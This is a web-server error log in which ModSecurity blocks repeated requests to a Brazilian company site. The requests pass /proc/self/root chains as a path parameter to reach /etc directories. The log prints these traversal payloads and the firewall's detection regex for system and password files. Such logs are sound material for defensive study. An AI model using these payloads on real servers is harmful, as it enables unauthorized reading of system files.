[uri "/"] [unique_id "abmqW8U6Sx0TG1YjmQi85wAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:13.398524 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.243.128:51830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqXRj0p0SRWAqcjGGICAAAAww"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:16.599763 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.241.31:47004] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqYMU6Sx0TG1YjmQi87AAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:19.440263 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.31:56466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqYweiSKl8TjouI-YmSwAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:21.089108 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:56478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqZda6ubjKNq_cu4YWtQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:31.034078 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33226] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:24:33.207630 2026] [:error] [pid 18380:tid 140411699963648] [client 74.7.241.31:54424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqca4xEDsg_V3ESNZZtwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:24:33.461874 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.228.61:57258] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmqcQeiSKl8TjouI-YmUgAAA9U"]
[Tue Mar 17 16:24:52.129949 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33582] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:24:53.216231 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:49798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqhRj0p0SRWAqcjGGIFgAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:24:58.115205 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.31:39262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqiqBJNF7axNlVR0UnBgAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:02.284110 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:35546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqjhj0p0SRWAqcjGGIGAAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:08.882079 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:43236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqlMU6Sx0TG1YjmQi9AwAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:10.755171 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:43242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqltY0UrI5A3LftIwLqgAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:12.613252 2026] [:error] [pid 25836:tid 140411666392832] [client 74.7.241.31:43246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqmIh-PF_25v4hFRB5fQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:14.089098 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.31:43258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqmq4xEDsg_V3ESNZZwAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:14.141241 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33948] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:25:15.751014 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:43260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqmxj0p0SRWAqcjGGIHwAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:17.271634 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:58794] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqnYh-PF_25v4hFRB5gAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:35.129778 2026] [proxy_fcgi:error] [pid 29151:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34294] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:25:39.338030 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.241.31:58806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqs64xEDsg_V3ESNZZ1AAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:41.374333 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.241.31:36262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqtXIk7brgkOH-rIWaRwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:53.007471 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.241.31:50586] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqwa4xEDsg_V3ESNZZ2gAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:54.444438 2026] [:error] [pid 29151:tid 140411590858496] [client 74.7.241.31:50600] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqwvPqhzTj3BvfDX-WBAAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:55.882257 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:50612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqw4h-PF_25v4hFRB5mAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:25:56.121803 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:25:58.572221 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:42788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqxta6ubjKNq_cu4YW3wAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
